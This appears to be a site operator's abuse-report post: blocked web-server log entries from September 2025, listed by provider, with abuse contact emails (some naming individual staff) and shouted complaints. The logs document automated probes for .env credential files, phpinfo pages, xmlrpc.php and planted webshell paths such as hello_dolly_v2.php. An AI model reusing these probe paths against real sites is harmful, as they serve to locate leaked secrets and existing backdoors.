146.70.192.182 website*x.de – – [14/Sep/2025:06:37:18 +0200] „GET /wp-admin/images/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:18 +0200] „GET /wp-includes/css/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:18 +0200] „GET /wp-includes/block-supports/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:18 +0200] „GET /wp-admin/maint/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:19 +0200] „GET /wp-admin/includes/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:19 +0200] „GET /images/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:19 +0200] „GET /wp-content/plugins/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:19 +0200] „GET /wp-includes/images/crystal/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:20 +0200] „GET /wp-includes/sitemaps/providers/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:20 +0200] „GET /wp-includes/rest-api/search/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:20 +0200] „GET /admin/uploads/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:20 +0200] „GET /wp-admin/meta/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:21 +0200] „GET /wp-includes/ID3/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:21 +0200] „GET /wp-includes/SimplePie/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:21 +0200] „GET /wp-content/themes/twentytwentyfour/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:21 +0200] „GET /wp-content/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:22 +0200] „GET /private/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:22 +0200] „GET /wp-admin/css/colors/modern/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:22 +0200] „GET /wp-includes/Requests/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:22 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:23 +0200] „GET /wp-content/upgrade/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:23 +0200] „GET /wp-includes/sitemaps/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:23 +0200] „GET /wp-content/uploads/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:23 +0200] „GET /assets/images/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:24 +0200] „GET /wp-includes/css/dist/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:24 +0200] „GET /wp/wp-admin/includes/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:24 +0200] „GET /wp-includes/widgets/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:24 +0200] „GET /wp-content/up HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:25 +0200] „GET /wp-admin/css/colors/midnight/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:37:25 +0200] „GET /wp-includes/certificates/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“

MAIL NR. 15 SONNTAG

abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com,dmzhostabuse@gmail.com,subhrajyoti.pramanik@indinet.co.in,anurag.shrivastava@siti.esselgroup.com,Deepak.Garg@siti.esselgroup.com

AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
20.91.142.198 website*x.de – – [14/Sep/2025:03:34:31 +0200] „GET /aa.php HTTP/1.0“ 302 – „-“ „-“

AS48090 – TECHOFF SRV LIMITED – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
93.123.109.81 www.website*x.de – – [14/Sep/2025:04:31:07 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
93.123.109.81 www.website*x.de – – [14/Sep/2025:04:31:07 +0200] „GET /.env.save HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
93.123.109.81 www.website*x.de – – [14/Sep/2025:04:31:07 +0200] „GET /.env.prod HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
93.123.109.81 www.website*x.de – – [14/Sep/2025:04:31:07 +0200] „GET /api/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
93.123.109.81 www.website*x.de – – [14/Sep/2025:04:31:08 +0200] „GET /dev/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
93.123.109.81 www.website*x.de – – [14/Sep/2025:04:31:08 +0200] „GET /application/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
93.123.109.81 www.website*x.de – – [14/Sep/2025:04:31:08 +0200] „GET /phpinfo.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
93.123.109.81 www.website*x.de – – [14/Sep/2025:04:31:08 +0200] „GET /phpinfo HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
93.123.109.81 www.website*x.de – – [14/Sep/2025:04:31:08 +0200] „GET /php_info.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
93.123.109.81 www.website*x.de – – [14/Sep/2025:04:31:08 +0200] „GET /_profiler/phpinfo HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
93.123.109.81 www.website*x.de – – [14/Sep/2025:04:31:09 +0200] „GET /backend/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
93.123.109.81 www.website*x.de – – [14/Sep/2025:04:31:09 +0200] „GET /.env.example HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
93.123.109.81 www.website*x.de – – [14/Sep/2025:04:31:09 +0200] „GET /admin/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
93.123.109.81 www.website*x.de – – [14/Sep/2025:04:31:09 +0200] „GET /info HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
93.123.109.81 www.website*x.de – – [14/Sep/2025:04:31:09 +0200] „POST / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“

AS17747 – SITI NETWORKS LIMITED – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
202.142.121.193 www.website*x.de – – [14/Sep/2025:07:35:45 +0200] „GET /wp-content/plugins/si-contact-form/captcha/securimage_show.php?prefix=ubsMBJdzTAlk10Os HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43“

MAIL NR. 16 SONNTAG

info@smartlink-isp.com,google-cloud-compliance@google.com, network-abuse@google.com,reports@magnates.co.za

AS210413 – Smart Link Company for Internet Service – AGAIN AND AGAIN!!! – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
45.157.54.21 website*x.com – – [14/Sep/2025:15:24:15 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
45.157.54.21 website*x.com – – [14/Sep/2025:15:24:15 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“

AS214209 – Internet Magnate (Pty) Ltd – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
94.156.152.52 website*x.com – – [14/Sep/2025:19:03:11 +0200] „GET /style.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
94.156.152.52 website*x.com – – [14/Sep/2025:19:03:54 +0200] „GET /style.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

MAIL NR. 17 SONNTAG

complain@irinn.in,kaushik@alliancekolkata.com,abuse@telstra.net,abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com

AS23860 – Alliance Broadband Services Pvt. Ltd. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
103.102.116.123 website*x.com – – [14/Sep/2025:19:27:02 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; arm64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/96.0.0.0 Safari/537.36“

AS1221 – Telstra Limited – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
2001:8003:5c1b:e901:8109:84ce:1c25:9a56 website*x.com – – [14/Sep/2025:19:44:36 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
4.227.92.81 website*x.com – – [14/Sep/2025:19:58:39 +0200] „GET /aa.php HTTP/1.0“ 302 – „-“ „-“

MAIL NR. 18 SONNTAG

google-cloud-compliance@google.com, network-abuse@google.com,abuse@slt.lk,info@smartlink-isp.com

AS396982 – Google LLC – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
34.182.42.111 www.website*x.de – – [14/Sep/2025:17:16:32 +0200] „HEAD /home HTTP/1.0“ 403 – „http://website*x.de/home“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.86 Safari/537.36 Brave/1.62.162“
34.182.42.111 www.website*x.de – – [14/Sep/2025:17:16:32 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „http://website*x.de/wordpress“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0“
34.182.42.111 www.website*x.de – – [14/Sep/2025:17:16:32 +0200] „HEAD /bc HTTP/1.0“ 403 – „http://website*x.de/bc“ „Mozilla/5.0 (iPad; CPU OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/123.0.6312.52 Mobile/15E148 Safari/604.1“
34.182.42.111 www.website*x.de – – [14/Sep/2025:17:16:32 +0200] „HEAD /old HTTP/1.0“ 403 – „http://website*x.de/old“ „Mozilla/5.0 (Linux; Android 10; Nokia 2720 Flip) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.99 Mobile Safari/537.36 KAIOS/2.5“
34.182.42.111 www.website*x.de – – [14/Sep/2025:17:16:33 +0200] „HEAD /bk HTTP/1.0“ 403 – „http://website*x.de/bk“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6280.88 Safari/537.36“
34.182.42.111 www.website*x.de – – [14/Sep/2025:17:16:33 +0200] „HEAD /backup HTTP/1.0“ 403 – „http://website*x.de/backup“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0“
34.182.42.111 www.website*x.de – – [14/Sep/2025:17:16:33 +0200] „HEAD / HTTP/1.0“ 403 – „http://website*x.de/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.200 YaBrowser/24.1.0.0 Safari/537.36“
34.182.42.111 www.website*x.de – – [14/Sep/2025:17:16:34 +0200] „HEAD /new HTTP/1.0“ 403 – „http://website*x.de/new“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36“
34.182.42.111 www.website*x.de – – [14/Sep/2025:17:16:34 +0200] „HEAD /main HTTP/1.0“ 403 – „http://website*x.de/main“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36“
34.182.42.111 www.website*x.de – – [14/Sep/2025:17:16:34 +0200] „HEAD /wp HTTP/1.0“ 403 – „http://website*x.de/wp“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36“

AS210413 – Smart Link Company for Internet Service – AGAIN AND AGAIN!!! – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
45.157.54.21 www.website*x.de – – [14/Sep/2025:18:11:02 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
45.157.54.21 www.website*x.de – – [14/Sep/2025:18:13:28 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“

AS9329 – Sri Lanka Telecom Internet – ALSO AGAIN AND AGAIN!!! – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
220.247.224.162 www.website*x.de – – [14/Sep/2025:23:40:28 +0200] „GET /wp-content/plugins/WordPressCore/include.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 www.website*x.de – – [14/Sep/2025:23:40:28 +0200] „GET /wp-content/plugins/WordPressCore-1/include.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 www.website*x.de – – [14/Sep/2025:23:40:28 +0200] „GET /wp-content/themes/include.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 www.website*x.de – – [14/Sep/2025:23:40:29 +0200] „GET /wp-content/plugins/include.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 www.website*x.de – – [14/Sep/2025:23:40:29 +0200] „GET /wp-includes/images/include.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 www.website*x.de – – [14/Sep/2025:23:40:30 +0200] „GET /wp-includes/widgets/include.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 www.website*x.de – – [14/Sep/2025:23:40:30 +0200] „GET /wp-content/plugins/HelloDollyV2/hello_dolly_v2.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 www.website*x.de – – [14/Sep/2025:23:40:31 +0200] „GET /wp-content/plugins/HelloDollyV2-1/hello_dolly_v2.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 www.website*x.de – – [14/Sep/2025:23:40:31 +0200] „GET /wp-content/themes/hello_dolly_v2.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 www.website*x.de – – [14/Sep/2025:23:40:31 +0200] „GET /wp-content/plugins/hello_dolly_v2.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 www.website*x.de – – [14/Sep/2025:23:40:32 +0200] „GET /wp-includes/images/hello_dolly_v2.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 www.website*x.de – – [14/Sep/2025:23:40:32 +0200] „GET /wp-includes/widgets/hello_dolly_v2.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 www.website*x.de – – [14/Sep/2025:23:40:33 +0200] „GET /wp-content/plugins/HelloDollyV2_ncvt/hello_dolly_v2.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“

MAIL NR. 19 SONNTAG

abuse@cloudinnovation.org,tech@cloudinnovation.org,google-cloud-compliance@google.com, network-abuse@google.com,abuse@alibaba-inc.com

AS23674 – Nayatel (Pvt) Ltd – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@cloudinnovation.org = NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
154.192.0.105 website*x.de – – [14/Sep/2025:15:48:18 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.0.0 Safari/537.36“

AS396982 – Google LLC – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
104.154.172.252 website*x.com – – [14/Sep/2025:15:55:24 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.2365.66“
104.154.172.252 website*x.com – – [14/Sep/2025:15:55:24 +0200] „HEAD /bk HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6280.88 Safari/537.36“
104.154.172.252 website*x.com – – [14/Sep/2025:15:55:24 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36 Edg/125.0.2535.51“
104.154.172.252 website*x.com – – [14/Sep/2025:15:55:24 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36“
104.154.172.252 website*x.com – – [14/Sep/2025:15:55:24 +0200] „HEAD /main HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15“
104.154.172.252 website*x.com – – [14/Sep/2025:15:55:25 +0200] „HEAD /bc HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0“
104.154.172.252 website*x.com – – [14/Sep/2025:15:55:25 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0“
104.154.172.252 website*x.com – – [14/Sep/2025:15:55:25 +0200] „HEAD /home HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPad; CPU OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/123.0.6312.52 Mobile/15E148 Safari/604.1“
104.154.172.252 website*x.com – – [14/Sep/2025:15:55:25 +0200] „HEAD /wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.200 YaBrowser/24.1.0.0 Safari/537.36“
104.154.172.252 website*x.com – – [14/Sep/2025:15:55:25 +0200] „HEAD /backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.2365.66“

AS45102 – Alibaba (US) Technology Co., Ltd. – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
HERE WITH MANY IP´S!!! – VERY UNSECURE PROVIDER!
47.254.85.182 website*x.com – – [14/Sep/2025:20:18:18 +0200] „GET /Public/home/js/check.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
47.254.85.182 website*x.com – – [14/Sep/2025:20:18:22 +0200] „GET /static/admin/javascript/hetong.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
+
47.88.6.178 website*x.com – – [14/Sep/2025:20:18:25 +0200] „GET /Public/home/js/check.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
47.88.101.3 website*x.com – – [14/Sep/2025:20:18:27 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
+
